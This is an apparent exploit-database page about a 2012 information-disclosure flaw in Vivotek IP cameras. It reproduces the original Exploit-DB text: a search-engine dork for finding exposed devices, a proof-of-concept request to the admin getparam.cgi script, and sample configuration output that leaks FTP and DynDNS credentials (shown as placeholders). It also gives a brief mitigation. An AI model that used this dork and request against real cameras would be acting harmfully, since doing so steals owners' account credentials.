Vivotek Full Data Source CONFIG

vendor:

by:

Alejandro Leon Morales [GothicX]

5.5

CVSS

MEDIUM

Configuration vulnerability

CWE

Product Name:

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Microsoft Windows 7, Vista, XP, MacOS

2012

Vivotek Full Data Source CONFIG

This exploit allows an attacker to obtain sensitive information such as FTP and DynDNS account details. By accessing the 'getparam.cgi' script on the Vivotek server, the attacker can retrieve the configuration file containing the sensitive data.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict access to the 'getparam.cgi' script and implement proper access controls for sensitive information.

Source

Exploit-DB raw data:

 Exploit Title: Vivotek Full Data Source CONFIG
# Date: 09/07/12
# Author: Alejandro Leon Morales  [GothicX]
# Author Mail: Gothicx[at]freaknetwork[dot]in 
# Author Web: www.undermx.blogspot.mx
# Sofware web: www.vivotek.com
# Vulnerable version: all 
# Tested on:  Microsoft windows 7 / Vista / XP/ MacOS
# Dork:    "/setup/config.html"  ||allinurl:"setup/parafile.html"

 
[PoC]
 
http://server/cgi-bin/admin/getparam.cgi 


[INFO SENSIBLE]

ACCOUNT FTP
ACCOUNT DYNDNS 

[Result]

ddns_enable='1'
ddns_provider='DyndnsDynamic'
ddns_Safe100_hostname=''
ddns_Safe100_usernameemail=''
ddns_Safe100_passwordkey=''
ddns_DyndnsDynamic_hostname='hostname'
ddns_DyndnsDynamic_usernameemail='usernameemail'
ddns_DyndnsDynamic_passwordkey='passwordkey'
ddns_DyndnsCustom_hostname=''
ddns_DyndnsCustom_usernameemail=''
ddns_DyndnsCustom_passwordkey=''
ddns_TZO_hostname=''
ddns_TZO_usernameemail=''
ddns_TZO_passwordkey=''
ddns_DHS_hostname=''
ddns_DHS_usernameemail=''
ddns_DHS_passwordkey=''
ddns_DynInterfree_hostname=''
ddns_DynInterfree_usernameemail=''
ddns_DynInterfree_passwordkey=''
ddns_CustomSafe100_hostname=''
ddns_CustomSafe100_usernameemail=''
ddns_CustomSafe100_passwordkey=''
ddns_CustomSafe100_servername=''
server_i0_type='ftp'
server_i0_http_url='http://'
server_i0_http_username=''
server_i0_http_passwd=''
server_i0_ftp_address='FTPADDRESS'
server_i0_ftp_username='FTPUSERNAME'
server_i0_ftp_passwd='FTPPASSWD'
server_i0_ftp_port='21'
server_i0_ftp_passive='1'
server_i0_ftp_location='\\temp\\record'
----------------------------------------------------------------------------------------------------


[Sensitive data]

FTP ACCOUNTS:  server_i0_ftp_address='FTPADDRESS'
                                 server_i0_ftp_username='FTPUSERNAME'
                                 server_i0_ftp_passwd='FTPPASSWD'

DYNDNS ACCOUNTS: ddns_DyndnsDynamic_hostname='hostname'
                                         ddns_DyndnsDynamic_usernameemail='usernameemail'
                                         ddns_DyndnsDynamic_passwordkey='passwordkey'




//*************************************************************************************//
                                    Special Greetz: Maztor, Zeus, Klanx, Makuaz, Alverid, zer0 z0org